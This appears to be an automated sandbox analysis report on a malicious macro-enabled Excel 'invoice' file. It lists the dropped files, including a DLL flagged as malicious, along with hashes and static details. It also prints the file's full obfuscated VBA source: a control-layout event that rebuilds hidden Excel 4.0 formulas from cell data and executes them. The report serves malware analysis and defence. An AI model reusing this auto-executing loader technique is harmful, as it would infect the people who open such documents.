Preview:	MSQMx...........................g.......................h...........................................................................................g......EXCE........................................5...g.......;...........<...........A...........l...........................z...N"......................N"...................................................................................!..........+.......................+...........1...b...........N....................K..C...........F...........Q...........W........,..........M,......................d!..........d!..........d!..........d!..+...........0...........:...........;...................z ..........................................................G...........G.... ..........:!.......!..n"..........."......M,..."......M,..."......M,..."......M,..."......M,..."......M,..7#..........?...E...G.......E...G........................!......<...B............+../..................."K../.......................$...$............+..n370...."K..

C:\Users\user\AppData\Local\Temp\CabF71B.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\ECFE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	58876
Entropy (8bit):	7.857491563402148
Encrypted:	false
SSDEEP:	1536:hdAmaHr40WZUaY7DD5xr/9AL+XgTLNFqHA:himaL40mUaY7x1E+X6aA
MD5:	C2FBE4D3A75F3450ABDBDE7EBE2C57E8
SHA1:	609C0EC81CA6F725770A0C15925DD73D03F969BE
SHA-256:	787788CA81F91FC4E3CFD5E2575ADDDFE68574586D15F4EBD95D5361E08B6A67
SHA-512:	8EE63A3027AB76A7797E787196CE35C0F6CDDF8A601772F0E855E95494D39CE01699624750F32005E9C2165A12E50DE1B627DD45BEF2CC3D9C577923B1AB3827
Malicious:	false
Preview:	...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......\|_;.....W>~......x..u.n.....+.....(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.\|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	241332
Entropy (8bit):	4.206829785968174
Encrypted:	false
SSDEEP:	1536:cGmLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:czNNSk8DtKBrpb2vxrOpprf/nVq
MD5:	04BD5B6696E515B678CE16586EA12280
SHA1:	B3CADD6952256E34D589D72A7C0D5A72244858F5
SHA-256:	4BB0CFE24122BCD6AF99616E37AD30EB2B83A2171AD74B0616447F43130F2B8A
SHA-512:	8A4AFE5A20CB59BD5A103B6CDDB00A3F2058BE87C1EDFBFF9D9A15A7BDC4EEF22D78DC03866A9C2CB10C71533520DEB392D5D925DB0D4A50F633398AB1D2CF4A
Malicious:	false
Preview:	MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Local\Temp\TarF71C.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\WER4329.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	3110
Entropy (8bit):	3.6846455695361846
Encrypted:	false
SSDEEP:	96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3UO3:Wl7LBNuhhgG45nv55
MD5:	7A76CF4A63CAA99EEF79C38AA80AAF0F
SHA1:	03C8726703129F52FD529E560942F8FADF1EA117
SHA-256:	6E9F0EE19A5B245447D488FA363AD2BBDD3404CC8C9D6EF55FE70D68912B458A
SHA-512:	4B8B6D7BCD7CFDEADEF3E5FDD76B51F202833FD60B5A0BC3F240C99F3A88136402DAE1CA30EA00F8A9C210ED6FFE0A127ABCC7C11B01E9E8FBCC77E07038D13C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.

C:\Users\user\AppData\Local\Temp\bjcbglsw.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	319488
Entropy (8bit):	7.125176562164236
Encrypted:	false
SSDEEP:	6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
MD5:	597B02A17B8C012E25FA0A668004163B
SHA1:	424A6F131D5C765EFDB28E5CAAE5FE2834A82BB0
SHA-256:	E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
SHA-512:	C75D875F3ABE620779380E7AE0F4BBB59B0C823B40889084B51396CD166187CBD90F7FB4159969DF1C7C241930BAA93BD051BF2F8FFF9CB8402D00CFB60062D4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: Inv0209966048-20210111075675.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:._...........!...2.z...b.......&.......@...............................@..........................................................\|....................0.......................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.6....p.......2..............@..@.data................4..............@....text4...R.......T...R.............. ..@.rsrc...\|........0..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar1479.xar Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	modified
Size (bytes):	53145
Entropy (8bit):	7.833234247137564
Encrypted:	false
SSDEEP:	1536:1XSG3BX6F8kyhrQMxE9lzXW0o5LDQAB5dbTQGR:11xE8jABWBdP5dPb
MD5:	6012E5A6CC8CDCCD4A52AABA0323F51C
SHA1:	D3CF935301859A406621EC8AF2EE1A8B5DCAE469
SHA-256:	20C5174BB28C025870E4038A7542C47D02D728A5A840285C2C1A74A68F3449D5
SHA-512:	266AA268CC668DBECAF4F1170FFF19C10B813F8ECFF0E007B5E88EAC34474DDF0049E55559BD401C09A632DD187513A9BC85CF903933799CF3EF21DEB55C4EC3
Malicious:	false
Preview:	.V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{QO..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c\|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.\|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+..../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 14:42:52 2021, atime=Tue Jan 12 14:42:52 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.479469044579857
Encrypted:	false
SSDEEP:	12:85QliCLgXg/XAlCPCHaXtB8XzB/jWOU3XX+Wnicvb4+bDtZ3YilMMEpxRljKFTdK:856iU/XTd6jFWOMXYelDv3qcrNru/
MD5:	49D989898FFCAF075119D158B0F63E8B
SHA1:	1CE86D56DAECE349040CBA2E1D6ADF1FA5D77E60
SHA-256:	0AE8AFE0A665DD55E25355113355BCD900C7FA4CCCE511E66A547C08D49E3CA7
SHA-512:	D4EA7EB1201B748FF1F32E2191452B2C226CC84101C5B181163C11C3E0722BCA70CBA9475A0FE8F2B8D956BE0AC5750A7C63300ECEA6F2D38F82839FD18F6E89
Malicious:	false
Preview:	L..................F...........7G................... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....,R[}..Desktop.d......QK.X,R[}..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV8222874744_20210111490395.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue Jan 12 14:42:52 2021, atime=Tue Jan 12 14:43:00 2021, length=58882, window=hide
Category:	dropped
Size (bytes):	2218
Entropy (8bit):	4.514916532800293
Encrypted:	false
SSDEEP:	24:8KZk/XTd6jFyl2HG7aeli7IDv3qcdM7dD2KZk/XTd6jFyl2HG7aeli7IDv3qcdMj:8L/XT0jFycfBcQh2L/XT0jFycfBcQ/
MD5:	B390C8B91CEF8CE02AB0C8FD8F0CE8C3
SHA1:	D44C9D9829A842223FCD553A55854244B46938D1
SHA-256:	F77740D930D8D31B43078E71CFB74E73967291F8F331E8747482BD16DD413396
SHA-512:	CAE4631249E5F315CC141A49CBB87C5C0F7244A2973F12FDE3985BAC0EFB59FE38580E55B461BF6DFF0AE3971D33E02EB05B0B57542AC73E5D0C423061A3C52A
Malicious:	false
Preview:	L..................F.... ......{..........].c..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.(...,RS} .INV822~1.XLS..p.......Q.y.Q.y...8.....................I.N.V.8.2.2.2.8.7.4.7.4.4._.2.0.2.1.0.1.1.1.4.9.0.3.9.5...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\INV8222874744_20210111490395.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.8.2.2.2.8.7.4.7.4.4._.2.0.2.1.0.1.1.1.4.9.0.3.9.5...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	139
Entropy (8bit):	4.525575175052369
Encrypted:	false
SSDEEP:	3:oyBVomxWnnVXFcmAR0AC0VXFcmAR0ACmxWnnVXFcmAR0ACv:djUn9um03vum036n9um03s
MD5:	2AE03DDEFDCC0CF8B75D71BA439E47D2
SHA1:	95E3E444A034076242F0BA020F23854631380102
SHA-256:	FB0F9DE0086930ED62A76A414D959A9D2F031520F09CC8943476907DECF8BDED
SHA-512:	8EF34E1BB5B68B41438E48AC5643178C4C415AD9946CC8FEE8C603751291BB275A4B59B8D5D7D35639D8D21E32D073C6B19638FA55C0832D3ED77ECBEE6B10A9
Malicious:	false
Preview:	Desktop.LNK=0..[misc]..INV8222874744_20210111490395.LNK=0..INV8222874744_20210111490395.LNK=0..[misc]..INV8222874744_20210111490395.LNK=0..

C:\Users\user\Desktop\B70F0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	58882
Entropy (8bit):	7.856696209772593
Encrypted:	false
SSDEEP:	1536:hdAmaHr40WZw9N1AnaERZj9iDqvDgTLNFqqo:himaL40mEAna8TFvD6do
MD5:	0A4F968D9B316EB75BEB1678ECFD1A74
SHA1:	C01B5162C1FC49B3BF302362110AEE981BE558FA
SHA-256:	A7B46EEBEDD2500A8099B1D72DE5A759C972FE12EA6CC049E4AB0F94D8B38FFF
SHA-512:	20ADB1D7550DDE687E83150E5A75AF71C95DDF2AB992A85B5E9E60B6A24AC5884CF45812D80580CF4B47C55BB5EEE33769208CAE6FE12363DC8184065207A4EA
Malicious:	false
Preview:	...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......\|_;.....W>~......x..u.n.....+.....(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.\|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$INV8222874744_20210111490395.xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.775569597872742
TrID:	Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50% Excel Microsoft Office Open XML Format document (40004/1) 37.92% ZIP compressed archive (8000/1) 7.58%
File name:	INV8222874744_20210111490395.xlsm
File size:	42241
MD5:	032734a3c93c44855955d4769b7ded98
SHA1:	f38cd18659e0fb5d862bac1d9f24691dda4a292c
SHA256:	1e66c639f157fa066c2e4070a46cb0af32548f4fba63684120513433059cd26d
SHA512:	cd662cd2810fef6a50e9ad4fc9c43e2e56d6c6329a432a19709ea410e3cd8d6f5308a04a8f3f82604dea3e0c8aaa7b3d9959ad8815b097acf11207b32ba41ba9
SSDEEP:	768:wT1rKsMOiiWLB7m7dMEuiJD/IxuKLh5XKZ0hVqu8:KVMOkLB7m7hh/Ix5LvaZMqu8
File Content Preview:	PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	2

OLE File "/opt/package/joesandbox/database/analysis/338363/sample/INV8222874744_20210111490395.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Author:
Last Saved By:
Create Time:	2020-12-07T14:38:21Z
Last Saved Time:	2021-01-11T15:24:48Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 3200

General
Stream Path:	VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	3200
Data ASCII:	. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 e4 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Integer:
bycilke()
VB_Name
MiV(sem.value)
homepodd()
homepodd
Error
Integer)
bycilke
Function
ol).Name
"!"):
String
"ab":
Split(govs,
Randomize:
yellowsto(yel
Next:
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
yellowsto(Oa))))
Integer
yellowsto
ol).value
nimo(Int((UBound(nimo)
Replace(Vo,
Chr(sem.Row)
Sheets(ol).Cells(homepodd,
"ab"))
Split(kij(ol),
yellowsto(homepodd))
Rnd))
(Run(""
"moreP_"
Variant)
Attribute
Resume
pagesREviewsd(Optional
ecimovert(nimo
ecimovert
MsgBox

VBA Code

Attribute VB_Name = "Module1"

Function homepodd()
homepodd = 5 - 3
End Function

Function pagesREviewsd(Optional wq As Integer) As Integer
Dim O As Integer: Dim Oa As Integer: ol = 1
Sheets(ol).Cells(homepodd, ol).Name = bycilke & "ab":
Dim MiV(43901)
For Each sem In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
MiV(sem.value) = Chr(sem.Row)
Next
For Each nog In MiV
govs = govs + nog
Next
Oa = 9: kij = Split(govs, "!"): Ada = Split(kij(ol), yellowsto(homepodd))
For Each Vo In Ada
Sheets(ol).Cells(homepodd, ol).value = "=" & Replace(Vo, "?", ecimovert(Split(kij(0), yellowsto(Oa))))
On Error Resume Next:
MsgBox (Run("" & bycilke & "ab"))
Next: Oa = 2:
End Function
Function bycilke()
bycilke = "moreP_"
End Function
Function ecimovert(nimo As Variant) As String
Randomize: df = 2 - 1: ecimovert = nimo(Int((UBound(nimo) + df) * Rnd))
End Function


Function yellowsto(yel As Integer)
yellowsto = "$"
If yel = 2 Then yellowsto = "]"
End Function

VBA File Name: Sheet1.cls, Stream Size: 1627

General
Stream Path:	VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	1627
Data ASCII:	. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
Data Raw:	01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 ef 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Index
VB_Name
VB_Creatable
Application.OnTime
VB_Exposed
Long)
VB_Customizable
"REviewsd"
VB_Control
MultiPage"
VB_TemplateDerived
MSForms,
False
Attribute
Private
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
"pages"

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "view_1_a, 1, 0, MSForms, MultiPage"
Sub ResizePagess1()
Application.OnTime Now, "pages" & "REviewsd"
End Sub
Private Sub view_1_a_Layout(ByVal Index As Long)
ol = 765: ResizePagess1
End Sub

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General
Stream Path:	VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	999
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"ThisWorkbook"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	550
Entropy:	5.2471217966
